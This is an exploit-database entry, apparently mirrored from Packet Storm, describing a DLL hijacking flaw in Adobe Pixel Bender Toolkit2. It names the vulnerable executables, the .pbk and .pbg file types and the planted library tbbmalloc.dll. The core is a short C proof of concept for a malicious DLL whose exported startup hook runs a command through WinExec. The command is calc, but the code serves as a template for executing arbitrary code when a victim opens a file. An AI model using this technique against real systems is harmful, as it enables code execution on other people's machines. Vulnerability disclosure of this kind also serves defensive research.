Lucene search
K

Adobe Pixel Bender Toolkit2 11.0.422584 DLL Hijack

🗓️ 23 Aug 2012 00:00:00Reported by coolkavehType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Adobe Pixel Bender Toolkit2 (tbbmalloc.dll) DLL Hijacking Exploit. Vulnerable: Pixel Bender Toolkit.exe & sniffer_gpu.exe, extensions: .pbk & .pbg, Dll: tbbmalloc.dll, Version: 11.0.42258

Code
`Exploit Title: Adobe Pixel Bender Toolkit2 (tbbmalloc.dll) DLL Hijacking Exploit   
Date: 2012-08-23  
Author: coolkaveh  
[email protected]  
Greets To Mohammad Morteza Sanaie  
[email protected]  
Https://twitter.com/coolkaveh  
Vendor Homepage: http://www.adobe.com/  
Version: 11.0.422584  
Tested on: windows XP Sp3 ENG   
---------------------------------------------------------   
# Vulnerable: Pixel Bender Toolkit.exe & sniffer_gpu.exe  
---------------------------------------------------------  
# Vulnerable extensions: .pbk & .pbg  
---------------------------------------------------------  
# Vulnerable Dll: tbbmalloc.dll  
---------------------------------------------------------  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
  
DllExport void hook_startup() { exp(); }  
  
int exp()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation